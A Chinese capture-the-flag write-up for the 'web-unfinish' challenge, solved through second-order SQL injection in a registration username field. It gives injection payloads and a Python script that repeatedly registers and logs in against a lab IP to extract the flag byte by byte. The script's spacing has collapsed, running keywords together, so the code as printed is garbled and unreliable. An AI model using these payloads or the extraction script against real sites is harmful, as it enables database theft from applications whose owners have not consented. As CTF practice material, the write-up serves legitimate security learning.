[CTF]攻防世界：web-unfinish（sql二次注入）

题目：web-unfinish（sql二次注入）

二次注入

打开页面是一个登录页面

步骤

1. 扫描一下目录：

有登录有注册

2. 先测试登录是否存在sql，测试了一下发现似乎不存在。
   

3. 继续测试注册，先正常注册一个用户，登录看看。
   
   登录成功，能看到用户名。
   

4. 试试再注册的时候，给用户名位置写上注入测试：0’+1+'0，登录后发现用户名变为1.
   

使用Burp Suite Fuzz 了一下，当用户名中有 information 或 , 时，会提示 nonono!!!

5. 只能猜表名为flag.
   通过payload依次读取flag值：0'+ascii(substr(select * from flag) from 1 for 1)+'0

6. 写个脚本，自动读出flag。

流程为：注册-》登录-》获取用户名值（ascii）

importrequestsimportreimporttime url="http://61.147.171.105:54224/"MAX_RETRIES_PER_POS=5# 重试 defget_flag():flag=""i=1# 从位置1开始whilei<50:email=f"user{i}@qq.com"username_payload=f"0'+ascii(SUBSTR((select * from flag) FROM {i} FOR 1))+'0"password="123"retry_count=0success=Falsewhileretry_count<=MAX_RETRIES_PER_POS:ifretry_count>0:print(f"[!] 尝试位置 {i} (尝试 {retry_count + 1})...")time.sleep(2)# 稍等再试try:print(f"[+] 尝试位置 {i}: {username_payload}")# 注册 r_reg=requests.post(url+"register.php",data={'email':email,'username':username_payload,'password':password},allow_redirects=False,timeout=10)ifr_reg.status_code!=302:# 可能是 SQL 错误或 flag 已结束（非网络问题）print(f"[-] 注册失败 {r_reg.status_code} 再位置 {i}. 结束.")success=True # 视为“正常结束”，跳出break# 登录 r_login=requests.post(url+"login.php",data={'email':email,'password':password},timeout=10)# 提取 ASCII match=re.search(r'<span class="user-name">\s*(\d+)\s*</span>',r_login.text)ifmatch:ascii_val=int(match.group(1))ifascii_val==0:print("[*] 结尾 (ASCII 0).")success=Truebreakchar=chr(ascii_val)flag+=charprint(f"[+] 位置 {i}: ASCII={ascii_val} => '{char}' | Flag : {flag}")success=Truebreakelse:print(f"[-] 找不到flag {i} :\n{r_login.text[:200]}")success=True # 无法提取，视为结束breakexcept(requests.exceptions.Timeout,requests.exceptions.ConnectionError)ase:retry_count+=1print(f"[-] 网络问题 position {i} (attempt {retry_count}): {e}")ifretry_count>MAX_RETRIES_PER_POS:print(f"[!] 超过最大重试 position {i}. 退出.")print("\n[!] flag (部分):",flag)returncontinue# 重试当前 i except Exceptionase:print(f"[-] 异常 position {i}: {e}")success=True # 非网络异常，不重试breakifnot success:print(f"[!] 错误 position {i} .")breakifsuccess and(r_reg.status_code!=302or(locals().get('match')andint(locals().get('match').group(1))==0)or notlocals().get('match')):breaki+=1# 成功获取一位，继续下一位 time.sleep(3)print("\n[!] flag:",flag)if__name__=='__main__':get_flag()

有疑问可留言解答…